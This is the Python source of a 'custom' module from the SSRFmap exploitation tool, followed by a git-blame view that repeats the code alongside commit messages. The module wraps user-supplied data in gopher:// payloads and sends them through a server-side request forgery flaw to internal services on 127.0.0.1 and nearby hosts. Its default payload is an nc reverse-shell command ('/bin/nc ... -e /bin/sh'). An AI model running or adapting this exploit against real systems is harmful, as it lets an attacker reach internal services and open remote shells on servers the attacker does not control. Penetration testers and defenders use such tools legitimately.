SSRFmap/modules/custom.py

from core.utils import *
import urllib.parse
import logging

name          = "custom"
description   = "Send custom data to a listening service, e.g: netcat"
author        = "Swissky"
documentation = []

class exploit():
    SERVICE_IP   = "127.0.0.1"
    SERVICE_PORT = "8080"
    SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"

    def __init__(self, requester, args):
        logging.info(f"Module '{name}' launched !")
        gen_hosts = gen_ip_list("127.0.0.1", args.level)
        self.SERVICE_PORT = input("Service Port: ")
        self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))

        for gen_host in gen_hosts:
            payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
            
            if args.verbose == True:
                logging.info(f"Generated payload : {payload}")

            r = requester.do_request(args.param, payload)

            if args.verbose == True:
                logging.info(f"Module '{name}' ended !")
MODULE - Send custom data to service (nc) + examples 2019-07-08 19:17:03 +00:00			`from core.utils import *`
			`import urllib.parse`
			`import logging`

			`name = "custom"`
			`description = "Send custom data to a listening service, e.g: netcat"`
			`author = "Swissky"`
			`documentation = []`

			`class exploit():`
			`SERVICE_IP = "127.0.0.1"`
			`SERVICE_PORT = "8080"`
			`SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"`

			`def __init__(self, requester, args):`
- Added logging to file for better troubleshooting - Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted: - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string]) - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}") - Added missing 'module launched' message for SMTP 2022-03-16 18:27:30 +00:00			`logging.info(f"Module '{name}' launched !")`
MODULE - Memcache store data 2019-07-08 21:46:48 +00:00			`gen_hosts = gen_ip_list("127.0.0.1", args.level)`
			`self.SERVICE_PORT = input("Service Port: ")`
			`self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))`
MODULE - Send custom data to service (nc) + examples 2019-07-08 19:17:03 +00:00
MODULE - Memcache store data 2019-07-08 21:46:48 +00:00			`for gen_host in gen_hosts:`
			`payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)`

			`if args.verbose == True:`
- Added logging to file for better troubleshooting - Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted: - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string]) - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}") - Added missing 'module launched' message for SMTP 2022-03-16 18:27:30 +00:00			`logging.info(f"Generated payload : {payload}")`
MODULE - Memcache store data 2019-07-08 21:46:48 +00:00
			`r = requester.do_request(args.param, payload)`

			`if args.verbose == True:`
- Added logging to file for better troubleshooting - Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted: - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string]) - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}") - Added missing 'module launched' message for SMTP 2022-03-16 18:27:30 +00:00			`logging.info(f"Module '{name}' ended !")`